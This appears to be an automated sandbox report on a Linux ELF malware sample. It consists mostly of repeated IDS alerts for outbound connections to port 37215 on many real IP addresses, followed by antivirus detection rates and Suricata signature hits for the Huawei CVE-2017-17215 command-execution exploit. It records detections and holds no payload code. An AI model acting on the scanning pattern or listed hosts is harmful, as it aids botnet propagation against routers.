              2024-10-12T23:06:02.284043+020028352221A Network Trojan was detected192.168.2.1443374156.203.105.22937215TCP
              2024-10-12T23:06:02.284188+020028352221A Network Trojan was detected192.168.2.1442946156.133.164.6337215TCP
              2024-10-12T23:06:02.284346+020028352221A Network Trojan was detected192.168.2.1454234156.85.255.12437215TCP
              2024-10-12T23:06:02.284413+020028352221A Network Trojan was detected192.168.2.1456552156.205.127.24037215TCP
              2024-10-12T23:06:02.284531+020028352221A Network Trojan was detected192.168.2.1456872156.247.227.19137215TCP
              2024-10-12T23:06:02.284562+020028352221A Network Trojan was detected192.168.2.1457716156.164.232.437215TCP
              2024-10-12T23:06:02.284652+020028352221A Network Trojan was detected192.168.2.1433206156.198.188.11437215TCP
              2024-10-12T23:06:02.284955+020028352221A Network Trojan was detected192.168.2.1449840156.148.80.17837215TCP
              2024-10-12T23:06:02.285088+020028352221A Network Trojan was detected192.168.2.1440690156.62.51.2537215TCP
              2024-10-12T23:06:02.285270+020028352221A Network Trojan was detected192.168.2.1449678156.124.29.16837215TCP
              2024-10-12T23:06:02.285400+020028352221A Network Trojan was detected192.168.2.1455336156.24.85.16537215TCP
              2024-10-12T23:06:02.285443+020028352221A Network Trojan was detected192.168.2.1440700156.207.163.3937215TCP
              2024-10-12T23:06:02.285445+020028352221A Network Trojan was detected192.168.2.1434390156.135.169.22237215TCP
              2024-10-12T23:06:02.285564+020028352221A Network Trojan was detected192.168.2.1447620156.181.214.7237215TCP
              2024-10-12T23:06:02.286014+020028352221A Network Trojan was detected192.168.2.1447214156.35.238.21637215TCP
              2024-10-12T23:06:02.287839+020028352221A Network Trojan was detected192.168.2.1447192156.109.132.3437215TCP
              2024-10-12T23:06:02.288056+020028352221A Network Trojan was detected192.168.2.1435168156.225.47.4637215TCP
              2024-10-12T23:06:02.288137+020028352221A Network Trojan was detected192.168.2.1448938156.141.161.4137215TCP
              2024-10-12T23:06:02.288957+020028352221A Network Trojan was detected192.168.2.1441662156.206.240.5037215TCP
              2024-10-12T23:06:02.289115+020028352221A Network Trojan was detected192.168.2.1441696156.126.71.10937215TCP
              2024-10-12T23:06:02.298343+020028352221A Network Trojan was detected192.168.2.1449636156.114.240.21537215TCP
              2024-10-12T23:06:02.298950+020028352221A Network Trojan was detected192.168.2.1442252156.69.125.6837215TCP
              2024-10-12T23:06:02.299629+020028352221A Network Trojan was detected192.168.2.1446678156.151.177.937215TCP
              2024-10-12T23:06:02.320436+020028352221A Network Trojan was detected192.168.2.1434904156.105.215.2037215TCP
              2024-10-12T23:06:02.414576+020028352221A Network Trojan was detected192.168.2.1460148156.73.40.237215TCP
              2024-10-12T23:06:03.282975+020028352221A Network Trojan was detected192.168.2.1449708197.12.167.8137215TCP
              2024-10-12T23:06:03.283653+020028352221A Network Trojan was detected192.168.2.1434326197.1.243.11437215TCP
              2024-10-12T23:06:03.283745+020028352221A Network Trojan was detected192.168.2.1455918197.178.199.5437215TCP
              2024-10-12T23:06:03.299095+020028352221A Network Trojan was detected192.168.2.1441608197.149.105.6137215TCP
              2024-10-12T23:06:03.299368+020028352221A Network Trojan was detected192.168.2.1437788197.84.116.19337215TCP
              2024-10-12T23:06:03.299500+020028352221A Network Trojan was detected192.168.2.1446826156.16.199.22737215TCP
              2024-10-12T23:06:03.299575+020028352221A Network Trojan was detected192.168.2.1456992197.152.90.7537215TCP
              2024-10-12T23:06:03.299615+020028352221A Network Trojan was detected192.168.2.1454316197.142.217.18637215TCP
              2024-10-12T23:06:03.299669+020028352221A Network Trojan was detected192.168.2.1441002197.142.91.12237215TCP
              2024-10-12T23:06:03.300548+020028352221A Network Trojan was detected192.168.2.1440716197.118.213.13037215TCP
              2024-10-12T23:06:03.300579+020028352221A Network Trojan was detected192.168.2.1446502197.144.234.15237215TCP
              2024-10-12T23:06:03.300623+020028352221A Network Trojan was detected192.168.2.1460216197.216.217.9737215TCP
              2024-10-12T23:06:03.300780+020028352221A Network Trojan was detected192.168.2.1439514197.115.232.20237215TCP
              2024-10-12T23:06:03.300847+020028352221A Network Trojan was detected192.168.2.1458352156.63.184.1737215TCP
              2024-10-12T23:06:03.301011+020028352221A Network Trojan was detected192.168.2.1453046197.197.10.7637215TCP
              2024-10-12T23:06:03.314228+020028352221A Network Trojan was detected192.168.2.1445326197.75.31.5937215TCP
              2024-10-12T23:06:03.314687+020028352221A Network Trojan was detected192.168.2.1440426156.212.242.9537215TCP
              2024-10-12T23:06:03.314961+020028352221A Network Trojan was detected192.168.2.1452366197.212.218.3637215TCP
              2024-10-12T23:06:03.315373+020028352221A Network Trojan was detected192.168.2.1457572156.30.51.14737215TCP
              2024-10-12T23:06:03.316516+020028352221A Network Trojan was detected192.168.2.1459280197.216.170.19737215TCP
              2024-10-12T23:06:03.316822+020028352221A Network Trojan was detected192.168.2.1451286197.213.20.2837215TCP
              2024-10-12T23:06:03.316897+020028352221A Network Trojan was detected192.168.2.1447046197.32.137.21137215TCP
              2024-10-12T23:06:03.318296+020028352221A Network Trojan was detected192.168.2.1437376197.164.1.6637215TCP
              2024-10-12T23:06:03.319351+020028352221A Network Trojan was detected192.168.2.1433378197.33.240.937215TCP
              2024-10-12T23:06:03.319455+020028352221A Network Trojan was detected192.168.2.1438374156.16.219.16737215TCP
              2024-10-12T23:06:03.320060+020028352221A Network Trojan was detected192.168.2.1436224197.103.112.3637215TCP
              2024-10-12T23:06:03.320523+020028352221A Network Trojan was detected192.168.2.1456046197.28.210.17537215TCP
              2024-10-12T23:06:03.331070+020028352221A Network Trojan was detected192.168.2.1434778197.250.197.11437215TCP
              2024-10-12T23:06:03.332117+020028352221A Network Trojan was detected192.168.2.1459852156.57.144.5237215TCP
              2024-10-12T23:06:03.428493+020028352221A Network Trojan was detected192.168.2.1450198156.176.181.6637215TCP
              2024-10-12T23:06:04.330446+020028352221A Network Trojan was detected192.168.2.1450240156.234.227.12937215TCP
              2024-10-12T23:06:04.332092+020028352221A Network Trojan was detected192.168.2.1458296197.130.75.13937215TCP
              2024-10-12T23:06:04.332245+020028352221A Network Trojan was detected192.168.2.1458166156.175.245.3637215TCP
              2024-10-12T23:06:04.332326+020028352221A Network Trojan was detected192.168.2.1439302156.181.241.5537215TCP
              2024-10-12T23:06:04.345513+020028352221A Network Trojan was detected192.168.2.1439106156.5.107.1437215TCP
              2024-10-12T23:06:04.346024+020028352221A Network Trojan was detected192.168.2.1441482197.75.243.9837215TCP
              2024-10-12T23:06:04.347422+020028352221A Network Trojan was detected192.168.2.1457228197.18.119.13637215TCP
              2024-10-12T23:06:04.347501+020028352221A Network Trojan was detected192.168.2.1437968197.149.224.13437215TCP
              2024-10-12T23:06:04.351318+020028352221A Network Trojan was detected192.168.2.1438102197.148.208.12837215TCP
              2024-10-12T23:06:04.361133+020028352221A Network Trojan was detected192.168.2.1459406197.15.186.21737215TCP
              2024-10-12T23:06:04.361562+020028352221A Network Trojan was detected192.168.2.1437670197.86.127.2137215TCP
              2024-10-12T23:06:04.362200+020028352221A Network Trojan was detected192.168.2.1455056156.116.53.4837215TCP
              2024-10-12T23:06:04.367160+020028352221A Network Trojan was detected192.168.2.1433358197.245.127.16537215TCP
              2024-10-12T23:06:04.406795+020028352221A Network Trojan was detected192.168.2.1460806197.155.94.15337215TCP
              2024-10-12T23:06:05.346357+020028352221A Network Trojan was detected192.168.2.1443216156.49.78.6037215TCP
              2024-10-12T23:06:05.361801+020028352221A Network Trojan was detected192.168.2.1441674156.143.23.16237215TCP
              2024-10-12T23:06:05.361870+020028352221A Network Trojan was detected192.168.2.1457166156.121.26.13937215TCP
              2024-10-12T23:06:05.361884+020028352221A Network Trojan was detected192.168.2.1433944197.217.55.21037215TCP
              2024-10-12T23:06:05.365306+020028352221A Network Trojan was detected192.168.2.1453550197.32.9.11637215TCP
              2024-10-12T23:06:05.365372+020028352221A Network Trojan was detected192.168.2.1435410156.42.55.237215TCP
              2024-10-12T23:06:05.378960+020028352221A Network Trojan was detected192.168.2.1443550197.223.142.11237215TCP
              2024-10-12T23:06:05.394910+020028352221A Network Trojan was detected192.168.2.1448898197.42.45.17037215TCP
              2024-10-12T23:06:05.396548+020028352221A Network Trojan was detected192.168.2.1451814197.66.132.10737215TCP
              2024-10-12T23:06:05.396609+020028352221A Network Trojan was detected192.168.2.1436140156.124.4.11837215TCP
              2024-10-12T23:06:05.396825+020028352221A Network Trojan was detected192.168.2.1449418197.74.64.7937215TCP
              2024-10-12T23:06:05.410151+020028352221A Network Trojan was detected192.168.2.1445172197.130.150.8637215TCP
              2024-10-12T23:06:05.412218+020028352221A Network Trojan was detected192.168.2.1437980197.27.143.23837215TCP
              2024-10-12T23:06:05.414061+020028352221A Network Trojan was detected192.168.2.1435286197.188.12.10437215TCP
              2024-10-12T23:06:05.443559+020028352221A Network Trojan was detected192.168.2.1436000197.200.12.1937215TCP
              2024-10-12T23:06:05.459463+020028352221A Network Trojan was detected192.168.2.1453736156.199.58.11237215TCP
              2024-10-12T23:06:05.863958+020028352221A Network Trojan was detected192.168.2.1436138197.4.11.20737215TCP
              2024-10-12T23:06:06.361172+020028352221A Network Trojan was detected192.168.2.1439140197.244.244.23437215TCP
              2024-10-12T23:06:06.377801+020028352221A Network Trojan was detected192.168.2.1460166197.239.134.17337215TCP
              2024-10-12T23:06:06.378099+020028352221A Network Trojan was detected192.168.2.1446306197.170.145.13837215TCP
              2024-10-12T23:06:06.378152+020028352221A Network Trojan was detected192.168.2.1436890197.29.96.21737215TCP
              2024-10-12T23:06:06.378154+020028352221A Network Trojan was detected192.168.2.1445002197.186.237.5737215TCP
              2024-10-12T23:06:06.378179+020028352221A Network Trojan was detected192.168.2.1454268197.104.157.537215TCP
              2024-10-12T23:06:06.379454+020028352221A Network Trojan was detected192.168.2.1448834197.183.86.11337215TCP
              2024-10-12T23:06:06.379467+020028352221A Network Trojan was detected192.168.2.1454234197.189.255.7237215TCP
              2024-10-12T23:06:06.379643+020028352221A Network Trojan was detected192.168.2.1440864197.172.156.5637215TCP
              2024-10-12T23:06:06.384188+020028352221A Network Trojan was detected192.168.2.1437772197.228.91.4337215TCP
              2024-10-12T23:06:06.399382+020028352221A Network Trojan was detected192.168.2.1438612197.38.138.7437215TCP
              2024-10-12T23:06:06.399424+020028352221A Network Trojan was detected192.168.2.1457498197.177.125.13437215TCP
              2024-10-12T23:06:06.408563+020028352221A Network Trojan was detected192.168.2.1450088197.166.187.21037215TCP
              2024-10-12T23:06:06.408779+020028352221A Network Trojan was detected192.168.2.1458788197.122.125.17937215TCP
              2024-10-12T23:06:06.412346+020028352221A Network Trojan was detected192.168.2.1442520197.192.64.2137215TCP
              2024-10-12T23:06:06.443280+020028352221A Network Trojan was detected192.168.2.1453154156.79.109.11737215TCP
              2024-10-12T23:06:06.445823+020028352221A Network Trojan was detected192.168.2.1448724156.162.255.13437215TCP
              2024-10-12T23:06:06.474878+020028352221A Network Trojan was detected192.168.2.1446914197.225.103.16237215TCP
              2024-10-12T23:06:07.439497+020028352221A Network Trojan was detected192.168.2.1444442197.28.55.8637215TCP
              2024-10-12T23:06:07.439650+020028352221A Network Trojan was detected192.168.2.1440804197.138.241.17237215TCP
              2024-10-12T23:06:07.455868+020028352221A Network Trojan was detected192.168.2.1445362197.17.146.23137215TCP
              2024-10-12T23:06:07.456190+020028352221A Network Trojan was detected192.168.2.1434186197.66.201.4137215TCP
              2024-10-12T23:06:07.457295+020028352221A Network Trojan was detected192.168.2.1453058197.70.232.24437215TCP
              2024-10-12T23:06:07.457397+020028352221A Network Trojan was detected192.168.2.1443746197.222.92.10337215TCP
              2024-10-12T23:06:08.042197+020028352221A Network Trojan was detected192.168.2.1437454156.251.132.18437215TCP
              2024-10-12T23:06:08.503756+020028352221A Network Trojan was detected192.168.2.1446758156.172.226.3837215TCP
              2024-10-12T23:06:09.519539+020028352221A Network Trojan was detected192.168.2.1446630197.97.119.637215TCP
              2024-10-12T23:06:13.549397+020028352221A Network Trojan was detected192.168.2.1435646197.146.205.037215TCP
              2024-10-12T23:06:14.549921+020028352221A Network Trojan was detected192.168.2.1446594197.190.58.1937215TCP
              2024-10-12T23:06:14.564598+020028352221A Network Trojan was detected192.168.2.1455428197.137.221.13537215TCP
              2024-10-12T23:06:14.564826+020028352221A Network Trojan was detected192.168.2.1434322156.18.26.22537215TCP
              2024-10-12T23:06:14.564902+020028352221A Network Trojan was detected192.168.2.1452804197.215.215.20037215TCP
              2024-10-12T23:06:14.564937+020028352221A Network Trojan was detected192.168.2.1442614156.91.105.7937215TCP
              2024-10-12T23:06:14.564952+020028352221A Network Trojan was detected192.168.2.1435432197.194.233.4437215TCP
              2024-10-12T23:06:14.566324+020028352221A Network Trojan was detected192.168.2.1437894156.130.141.22137215TCP
              2024-10-12T23:06:14.566592+020028352221A Network Trojan was detected192.168.2.1433522156.57.166.6537215TCP
              2024-10-12T23:06:14.566683+020028352221A Network Trojan was detected192.168.2.1457028197.72.5.5637215TCP
              2024-10-12T23:06:14.569425+020028352221A Network Trojan was detected192.168.2.1442198197.202.84.10137215TCP
              2024-10-12T23:06:14.570485+020028352221A Network Trojan was detected192.168.2.1435018197.183.195.20237215TCP
              2024-10-12T23:06:14.615773+020028352221A Network Trojan was detected192.168.2.1459790197.185.25.3637215TCP
              2024-10-12T23:06:14.615824+020028352221A Network Trojan was detected192.168.2.1433400156.152.138.18437215TCP
              2024-10-12T23:06:15.434445+020028352221A Network Trojan was detected192.168.2.1453876197.129.227.3437215TCP
              2024-10-12T23:06:16.567224+020028352221A Network Trojan was detected192.168.2.1443076197.10.56.10537215TCP
              2024-10-12T23:06:16.568933+020028352221A Network Trojan was detected192.168.2.1448398197.161.83.18437215TCP
              2024-10-12T23:06:16.611844+020028352221A Network Trojan was detected192.168.2.1441948197.5.243.17637215TCP
              2024-10-12T23:06:16.615731+020028352221A Network Trojan was detected192.168.2.1453500156.7.96.19337215TCP
              2024-10-12T23:06:16.643557+020028352221A Network Trojan was detected192.168.2.1440878197.5.166.21637215TCP
              2024-10-12T23:06:16.646993+020028352221A Network Trojan was detected192.168.2.1445646197.242.234.14637215TCP
              2024-10-12T23:06:16.660294+020028352221A Network Trojan was detected192.168.2.1459900197.148.173.21837215TCP
              2024-10-12T23:06:16.719499+020028352221A Network Trojan was detected192.168.2.1443246197.94.81.3837215TCP
              2024-10-12T23:06:17.595914+020028352221A Network Trojan was detected192.168.2.1456628156.123.150.9837215TCP
              2024-10-12T23:06:17.596145+020028352221A Network Trojan was detected192.168.2.1454226156.80.41.11237215TCP
              2024-10-12T23:06:17.596228+020028352221A Network Trojan was detected192.168.2.1456534156.201.113.7937215TCP
              2024-10-12T23:06:17.611629+020028352221A Network Trojan was detected192.168.2.1434532156.147.14.15337215TCP
              2024-10-12T23:06:17.613208+020028352221A Network Trojan was detected192.168.2.1459772156.22.192.8137215TCP
              2024-10-12T23:06:17.613273+020028352221A Network Trojan was detected192.168.2.1442342156.107.165.14737215TCP
              2024-10-12T23:06:17.613337+020028352221A Network Trojan was detected192.168.2.1445140156.26.147.16137215TCP
              2024-10-12T23:06:17.617163+020028352221A Network Trojan was detected192.168.2.1454898156.87.118.837215TCP
              2024-10-12T23:06:17.617274+020028352221A Network Trojan was detected192.168.2.1433872156.214.208.12637215TCP
              2024-10-12T23:06:17.627232+020028352221A Network Trojan was detected192.168.2.1459842156.170.137.13137215TCP
              2024-10-12T23:06:18.658725+020028352221A Network Trojan was detected192.168.2.1438860197.254.40.1037215TCP
              2024-10-12T23:06:18.658780+020028352221A Network Trojan was detected192.168.2.1454822197.207.77.7237215TCP
              2024-10-12T23:06:18.660223+020028352221A Network Trojan was detected192.168.2.1452098156.18.187.18837215TCP
              2024-10-12T23:06:18.664226+020028352221A Network Trojan was detected192.168.2.1460586156.206.2.20737215TCP
              2024-10-12T23:06:18.664273+020028352221A Network Trojan was detected192.168.2.1451026197.51.148.11837215TCP
              2024-10-12T23:06:18.691555+020028352221A Network Trojan was detected192.168.2.1445666197.55.192.25337215TCP
              2024-10-12T23:06:18.693614+020028352221A Network Trojan was detected192.168.2.1445502197.119.189.15437215TCP
              2024-10-12T23:06:18.721190+020028352221A Network Trojan was detected192.168.2.1451498197.225.115.25137215TCP
              2024-10-12T23:06:18.723567+020028352221A Network Trojan was detected192.168.2.1452326197.41.98.12537215TCP
              2024-10-12T23:06:19.304575+020028352221A Network Trojan was detected192.168.2.1439678197.9.48.5337215TCP
              2024-10-12T23:06:19.640044+020028352221A Network Trojan was detected192.168.2.1447632197.8.140.21237215TCP
              2024-10-12T23:06:19.658289+020028352221A Network Trojan was detected192.168.2.1441226197.211.138.25237215TCP
              2024-10-12T23:06:19.658502+020028352221A Network Trojan was detected192.168.2.1454922197.178.239.19537215TCP
              2024-10-12T23:06:19.658592+020028352221A Network Trojan was detected192.168.2.1447682197.87.28.21137215TCP
              2024-10-12T23:06:19.658755+020028352221A Network Trojan was detected192.168.2.1440896197.19.52.23737215TCP
              2024-10-12T23:06:19.658859+020028352221A Network Trojan was detected192.168.2.1439586197.173.86.19637215TCP
              2024-10-12T23:06:19.659052+020028352221A Network Trojan was detected192.168.2.1458414197.186.140.437215TCP
              2024-10-12T23:06:19.659124+020028352221A Network Trojan was detected192.168.2.1456838197.85.202.18437215TCP
              2024-10-12T23:06:19.659261+020028352221A Network Trojan was detected192.168.2.1457434197.187.95.6937215TCP
              2024-10-12T23:06:19.659376+020028352221A Network Trojan was detected192.168.2.1446068197.59.240.17537215TCP
              2024-10-12T23:06:19.660097+020028352221A Network Trojan was detected192.168.2.1437202197.37.35.11037215TCP
              2024-10-12T23:06:19.660241+020028352221A Network Trojan was detected192.168.2.1455536197.90.170.14137215TCP
              2024-10-12T23:06:19.660261+020028352221A Network Trojan was detected192.168.2.1443236197.213.76.16337215TCP
              2024-10-12T23:06:19.660334+020028352221A Network Trojan was detected192.168.2.1447448197.35.88.8537215TCP
              2024-10-12T23:06:19.660572+020028352221A Network Trojan was detected192.168.2.1441838197.0.94.15337215TCP
              2024-10-12T23:06:19.662377+020028352221A Network Trojan was detected192.168.2.1450748197.13.201.837215TCP
              2024-10-12T23:06:19.677914+020028352221A Network Trojan was detected192.168.2.1456054197.14.31.15137215TCP
              2024-10-12T23:06:19.689894+020028352221A Network Trojan was detected192.168.2.1436196156.135.181.7537215TCP
              2024-10-12T23:06:19.695300+020028352221A Network Trojan was detected192.168.2.1449906156.63.45.21937215TCP
              2024-10-12T23:06:19.705135+020028352221A Network Trojan was detected192.168.2.1433758197.143.151.5037215TCP
              2024-10-12T23:06:19.710909+020028352221A Network Trojan was detected192.168.2.1443060156.183.7.9437215TCP
              2024-10-12T23:06:19.721636+020028352221A Network Trojan was detected192.168.2.1447758156.207.32.19737215TCP
              2024-10-12T23:06:20.162823+020028352221A Network Trojan was detected192.168.2.1444704156.224.164.19437215TCP
              2024-10-12T23:06:20.287236+020028352221A Network Trojan was detected192.168.2.1435582197.7.204.8637215TCP
              2024-10-12T23:06:20.484695+020028352221A Network Trojan was detected192.168.2.1450812197.25.221.9837215TCP
              2024-10-12T23:06:20.658660+020028352221A Network Trojan was detected192.168.2.1451004156.201.209.5137215TCP
              2024-10-12T23:06:20.658811+020028352221A Network Trojan was detected192.168.2.1458468156.10.192.15037215TCP
              2024-10-12T23:06:20.658904+020028352221A Network Trojan was detected192.168.2.1450238156.158.132.22737215TCP
              2024-10-12T23:06:20.674334+020028352221A Network Trojan was detected192.168.2.1443374156.32.12.17237215TCP
              2024-10-12T23:06:20.677837+020028352221A Network Trojan was detected192.168.2.1442922156.127.215.1937215TCP
              2024-10-12T23:06:20.678124+020028352221A Network Trojan was detected192.168.2.1438070156.79.140.24537215TCP
              2024-10-12T23:06:20.689315+020028352221A Network Trojan was detected192.168.2.1438474156.116.93.3637215TCP
              2024-10-12T23:06:20.689679+020028352221A Network Trojan was detected192.168.2.1444816156.51.23.137215TCP
              2024-10-12T23:06:20.693324+020028352221A Network Trojan was detected192.168.2.1442018156.115.95.2637215TCP
              2024-10-12T23:06:20.693420+020028352221A Network Trojan was detected192.168.2.1440242156.106.201.8337215TCP
              2024-10-12T23:06:20.693621+020028352221A Network Trojan was detected192.168.2.1439586156.184.26.11137215TCP
              2024-10-12T23:06:20.711221+020028352221A Network Trojan was detected192.168.2.1451938156.220.170.7237215TCP
              2024-10-12T23:06:21.689435+020028352221A Network Trojan was detected192.168.2.1453170197.36.169.22037215TCP
              2024-10-12T23:06:21.689770+020028352221A Network Trojan was detected192.168.2.1458086197.18.2.17037215TCP
              2024-10-12T23:06:21.689781+020028352221A Network Trojan was detected192.168.2.1436572197.253.187.24937215TCP
              2024-10-12T23:06:21.689955+020028352221A Network Trojan was detected192.168.2.1451842197.195.20.25437215TCP
              2024-10-12T23:06:21.690044+020028352221A Network Trojan was detected192.168.2.1459974197.185.137.19037215TCP
              2024-10-12T23:06:21.690111+020028352221A Network Trojan was detected192.168.2.1432960197.16.21.18237215TCP
              2024-10-12T23:06:21.690165+020028352221A Network Trojan was detected192.168.2.1440674197.61.193.14737215TCP
              2024-10-12T23:06:21.690363+020028352221A Network Trojan was detected192.168.2.1438470197.157.226.17037215TCP
              2024-10-12T23:06:21.705441+020028352221A Network Trojan was detected192.168.2.1441226197.124.204.16137215TCP
              2024-10-12T23:06:21.705929+020028352221A Network Trojan was detected192.168.2.1435918197.123.37.8637215TCP
              2024-10-12T23:06:21.705979+020028352221A Network Trojan was detected192.168.2.1438628197.189.12.4037215TCP
              2024-10-12T23:06:21.706301+020028352221A Network Trojan was detected192.168.2.1451352197.179.246.2637215TCP
              2024-10-12T23:06:21.706853+020028352221A Network Trojan was detected192.168.2.1439444197.63.2.18037215TCP
              2024-10-12T23:06:21.707255+020028352221A Network Trojan was detected192.168.2.1460296197.72.249.4437215TCP
              2024-10-12T23:06:21.707507+020028352221A Network Trojan was detected192.168.2.1444844197.34.108.5437215TCP
              2024-10-12T23:06:21.707628+020028352221A Network Trojan was detected192.168.2.1444978197.159.203.22137215TCP
              2024-10-12T23:06:21.707736+020028352221A Network Trojan was detected192.168.2.1448220197.151.24.24537215TCP
              2024-10-12T23:06:21.707788+020028352221A Network Trojan was detected192.168.2.1446456197.148.98.10037215TCP
              2024-10-12T23:06:21.708956+020028352221A Network Trojan was detected192.168.2.1434040197.145.191.2737215TCP
              2024-10-12T23:06:21.709037+020028352221A Network Trojan was detected192.168.2.1459214197.13.166.14137215TCP
              2024-10-12T23:06:21.709166+020028352221A Network Trojan was detected192.168.2.1447728197.126.242.5137215TCP
              2024-10-12T23:06:21.709360+020028352221A Network Trojan was detected192.168.2.1452956197.4.207.037215TCP
              2024-10-12T23:06:21.709437+020028352221A Network Trojan was detected192.168.2.1451498197.199.130.14537215TCP
              2024-10-12T23:06:21.710260+020028352221A Network Trojan was detected192.168.2.1435562197.18.38.6137215TCP
              2024-10-12T23:06:21.711241+020028352221A Network Trojan was detected192.168.2.1436850197.1.246.17237215TCP
              2024-10-12T23:06:21.721110+020028352221A Network Trojan was detected192.168.2.1441832197.203.191.11937215TCP
              2024-10-12T23:06:21.721207+020028352221A Network Trojan was detected192.168.2.1435548197.121.149.7637215TCP
              2024-10-12T23:06:21.722545+020028352221A Network Trojan was detected192.168.2.1455428197.155.113.1037215TCP
              2024-10-12T23:06:21.737164+020028352221A Network Trojan was detected192.168.2.1447908197.204.198.21937215TCP
              2024-10-12T23:06:21.737501+020028352221A Network Trojan was detected192.168.2.1454424197.21.71.5737215TCP
              2024-10-12T23:06:21.737530+020028352221A Network Trojan was detected192.168.2.1459222197.221.19.22237215TCP
              2024-10-12T23:06:21.737750+020028352221A Network Trojan was detected192.168.2.1447732197.220.142.16637215TCP
              2024-10-12T23:06:21.739223+020028352221A Network Trojan was detected192.168.2.1456406197.39.243.12937215TCP
              2024-10-12T23:06:21.739262+020028352221A Network Trojan was detected192.168.2.1441604197.33.99.9037215TCP
              2024-10-12T23:06:21.739305+020028352221A Network Trojan was detected192.168.2.1455246156.195.92.13137215TCP
              2024-10-12T23:06:21.740413+020028352221A Network Trojan was detected192.168.2.1439174197.136.21.17437215TCP
              2024-10-12T23:06:22.704954+020028352221A Network Trojan was detected192.168.2.1450636197.110.218.19337215TCP
              2024-10-12T23:06:22.705644+020028352221A Network Trojan was detected192.168.2.1451528156.65.99.22437215TCP
              2024-10-12T23:06:22.706116+020028352221A Network Trojan was detected192.168.2.1455542197.189.42.1437215TCP
              2024-10-12T23:06:22.721485+020028352221A Network Trojan was detected192.168.2.1454418156.119.34.3337215TCP
              2024-10-12T23:06:22.722703+020028352221A Network Trojan was detected192.168.2.1460306156.233.255.17437215TCP
              2024-10-12T23:06:22.737190+020028352221A Network Trojan was detected192.168.2.1460376197.151.52.5437215TCP
              2024-10-12T23:06:22.737269+020028352221A Network Trojan was detected192.168.2.1458276156.186.156.19637215TCP
              2024-10-12T23:06:22.737484+020028352221A Network Trojan was detected192.168.2.1435172156.129.214.25437215TCP
              2024-10-12T23:06:22.737665+020028352221A Network Trojan was detected192.168.2.1446372156.138.134.13437215TCP
              2024-10-12T23:06:22.737922+020028352221A Network Trojan was detected192.168.2.1446020156.49.131.18837215TCP
              2024-10-12T23:06:22.737961+020028352221A Network Trojan was detected192.168.2.1453386197.115.179.1437215TCP
              2024-10-12T23:06:22.738214+020028352221A Network Trojan was detected192.168.2.1452728197.228.193.15137215TCP
              2024-10-12T23:06:22.738303+020028352221A Network Trojan was detected192.168.2.1459596156.75.157.6437215TCP
              2024-10-12T23:06:22.738429+020028352221A Network Trojan was detected192.168.2.1448104156.78.32.12137215TCP
              2024-10-12T23:06:22.738772+020028352221A Network Trojan was detected192.168.2.1437480156.210.121.8737215TCP
              2024-10-12T23:06:22.738799+020028352221A Network Trojan was detected192.168.2.1456558156.127.68.15537215TCP
              2024-10-12T23:06:22.738963+020028352221A Network Trojan was detected192.168.2.1438942197.87.241.8237215TCP
              2024-10-12T23:06:22.739579+020028352221A Network Trojan was detected192.168.2.1443892156.139.154.8737215TCP
              2024-10-12T23:06:22.739805+020028352221A Network Trojan was detected192.168.2.1440924156.191.165.7137215TCP
              2024-10-12T23:06:22.741082+020028352221A Network Trojan was detected192.168.2.1439108156.112.142.18137215TCP
              2024-10-12T23:06:22.741200+020028352221A Network Trojan was detected192.168.2.1450728156.40.58.23537215TCP
              2024-10-12T23:06:22.741414+020028352221A Network Trojan was detected192.168.2.1432784156.216.51.9237215TCP
              2024-10-12T23:06:22.741814+020028352221A Network Trojan was detected192.168.2.1434460156.169.144.15737215TCP
              2024-10-12T23:06:22.742366+020028352221A Network Trojan was detected192.168.2.1451238156.163.156.22337215TCP
              2024-10-12T23:06:22.743229+020028352221A Network Trojan was detected192.168.2.1454454156.239.64.2237215TCP
              2024-10-12T23:06:22.743239+020028352221A Network Trojan was detected192.168.2.1459330197.176.41.14837215TCP
              2024-10-12T23:06:22.785258+020028352221A Network Trojan was detected192.168.2.1441954197.0.2.12637215TCP
              2024-10-12T23:06:23.736669+020028352221A Network Trojan was detected192.168.2.1453392156.103.184.23637215TCP
              2024-10-12T23:06:23.736780+020028352221A Network Trojan was detected192.168.2.1448640197.162.125.22937215TCP
              2024-10-12T23:06:23.830465+020028352221A Network Trojan was detected192.168.2.1453836197.253.199.10637215TCP
              2024-10-12T23:06:24.771843+020028352221A Network Trojan was detected192.168.2.1446474197.200.112.17037215TCP
              2024-10-12T23:06:24.784407+020028352221A Network Trojan was detected192.168.2.1445596197.111.8.3537215TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: jYEvdBHMOI.elfAvira: detected
              Source: jYEvdBHMOI.elfReversingLabs: Detection: 55%
              Source: jYEvdBHMOI.elfVirustotal: Detection: 59%Perma Link

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47802 -> 197.217.19.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60184 -> 197.130.210.234:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46160 -> 197.129.254.170:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53124 -> 197.4.197.25:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56270 -> 197.145.224.8:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42062 -> 197.147.154.127:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55328 -> 197.173.145.89:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41642 -> 156.224.250.122:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53940 -> 197.234.206.47:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47332 -> 197.67.144.185:37215
